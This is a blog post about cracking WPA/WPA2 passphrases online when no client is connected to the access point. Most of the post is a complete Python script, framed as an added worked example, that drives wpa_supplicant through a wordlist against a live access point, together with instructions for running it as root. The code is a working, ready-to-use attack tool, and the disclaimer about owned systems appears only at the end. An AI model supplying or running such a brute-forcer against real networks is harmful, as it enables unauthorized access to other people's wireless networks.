Thursday, December 26, 2013

WPA Brute-Forcer

The purpose of this Python script is to show that even without a client connected to a WPA/WPA2 access point, the passphrase can still be attacked.
For the script to work, wpa_supplicant and Python must be installed on the Linux system.
I have tested it on Kali Linux and it works fine.

I have heard from many people that without a "client" we are unable to crack a WPA passphrase. That is only partially true.

Yes, without a client connected to a WPA/WPA2 access point we cannot capture the 4-way handshake that Aircrack-ng needs for offline cracking. But we can still attack the network online: we use our own wireless adapter as the client and try to associate with the target access point using one candidate passphrase after another. The access point's 4-way handshake either completes (correct passphrase) or fails (wrong passphrase), and that result is our oracle.

The theory is simple...
 - we are not trying to capture a 4-way handshake, since no client is connected to the access point.
 - we run a dictionary attack against the access point itself, trying each passphrase from the list through our wireless adapter.

Note : Cracking is slow. Every guess needs a full association and handshake attempt against the live access point, so it runs at seconds per guess rather than the thousands of guesses per second of an offline attack, and every attempt is visible to the access point. The point is only to show that without a client connected to the target access point, we can still crack a WPA/WPA2 passphrase.
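As an added worked example (this is not the post's own script), here is how such an online dictionary attack can be driven through wpa_supplicant from Python. It assumes a Linux box with wpa_supplicant installed, root privileges, a wireless interface that no other supplicant or NetworkManager is managing, and the nl80211 driver; the interface name, the 20 second timeout and the exact wording of the wpa_supplicant event lines it matches (CTRL-EVENT-CONNECTED, "pre-shared key may be incorrect", reason=WRONG_KEY) are assumptions taken from wpa_supplicant's foreground output. Candidates outside the 8 to 63 printable-ASCII range that IEEE 802.11i allows are skipped before any frame is sent, and the PSK is derived locally with PBKDF2 so the throw-away config file needs no quoting.

```python
#!/usr/bin/env python3
"""Online WPA/WPA2-PSK dictionary attack driven through wpa_supplicant.

Added illustration, not the original post's script. For each candidate
passphrase it writes a throw-away wpa_supplicant config, runs wpa_supplicant
in the foreground against the target SSID and watches its event output to
see whether the 4-way handshake completed.
"""
import hashlib
import os
import select
import subprocess
import sys
import tempfile
import time

# Markers in wpa_supplicant's foreground output (wording assumed from
# current wpa_supplicant versions; adjust if your build prints differently).
CONNECTED_MARKERS = ("CTRL-EVENT-CONNECTED",)
WRONG_KEY_MARKERS = (
    "pre-shared key may be incorrect",  # "WPA: 4-Way Handshake failed - ..."
    "reason=WRONG_KEY",                 # "CTRL-EVENT-SSID-TEMP-DISABLED ... reason=WRONG_KEY"
)


def is_valid_passphrase(candidate: str) -> bool:
    """802.11i limits a passphrase to 8..63 printable ASCII characters,
    so anything else cannot be the AP's passphrase and is not worth sending."""
    return 8 <= len(candidate) <= 63 and all(32 <= ord(c) <= 126 for c in candidate)


def derive_psk(ssid: str, passphrase: str) -> str:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes), hex."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32).hex()


def build_config(ssid: str, passphrase: str) -> str:
    """wpa_supplicant config for one guess: hex SSID and a pre-derived hex PSK,
    so neither value needs quoting or escaping."""
    return (
        "ctrl_interface=/var/run/wpa_supplicant\n"
        "network={\n"
        f"    ssid={ssid.encode().hex()}\n"
        f"    psk={derive_psk(ssid, passphrase)}\n"
        "    key_mgmt=WPA-PSK\n"
        "}\n"
    )


def classify(line: str):
    """Map one wpa_supplicant output line to 'connected', 'wrong_key' or None."""
    if any(m in line for m in CONNECTED_MARKERS):
        return "connected"
    if any(m in line for m in WRONG_KEY_MARKERS):
        return "wrong_key"
    return None


def try_passphrase(iface: str, ssid: str, passphrase: str, timeout: float = 20.0) -> str:
    """Run wpa_supplicant with one guess; return 'connected', 'wrong_key',
    'timeout' (AP out of range or silent) or 'error' (wpa_supplicant exited)."""
    fd, path = tempfile.mkstemp(suffix=".conf")
    with os.fdopen(fd, "w") as f:
        f.write(build_config(ssid, passphrase))
    proc = subprocess.Popen(
        ["wpa_supplicant", "-i", iface, "-D", "nl80211", "-c", path],
        stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)
    verdict = "timeout"
    deadline = time.monotonic() + timeout
    try:
        while time.monotonic() < deadline:
            ready, _, _ = select.select([proc.stdout], [], [], 0.5)
            if not ready:
                continue
            line = proc.stdout.readline()
            if not line:            # EOF: wpa_supplicant died (not root, bad iface, ...)
                verdict = "error"
                break
            result = classify(line)
            if result:
                verdict = result
                break
    finally:
        proc.kill()                 # one fresh wpa_supplicant per guess
        proc.wait()
        os.unlink(path)
    return verdict


def crack(iface: str, ssid: str, wordlist_path: str):
    """Walk the wordlist; return the first passphrase that completes the handshake."""
    with open(wordlist_path, errors="ignore") as wl:
        for raw in wl:
            candidate = raw.rstrip("\r\n")
            if not is_valid_passphrase(candidate):
                continue
            verdict = try_passphrase(iface, ssid, candidate)
            print(f"[{verdict:>9}] {candidate}", file=sys.stderr)
            if verdict == "connected":
                return candidate
    return None


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} <iface> <ssid> <wordlist>")
    found = crack(*sys.argv[1:4])
    print(f"passphrase: {found}" if found else "exhausted wordlist, no match")
```

Run it as root, for example `python3 wpa_online.py wlan0 TargetSSID wordlist.txt`, after stopping NetworkManager or any other wpa_supplicant instance on that interface. With the assumed 20 second timeout the attack proceeds at a few guesses per minute, which is exactly the slowness the note above describes; a "timeout" verdict on every candidate usually means the access point is out of range or is rejecting the association before the handshake starts, not that the passphrase is wrong.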

Source code can be found here.
The script is written for educational purposes only. Test it only on systems you own.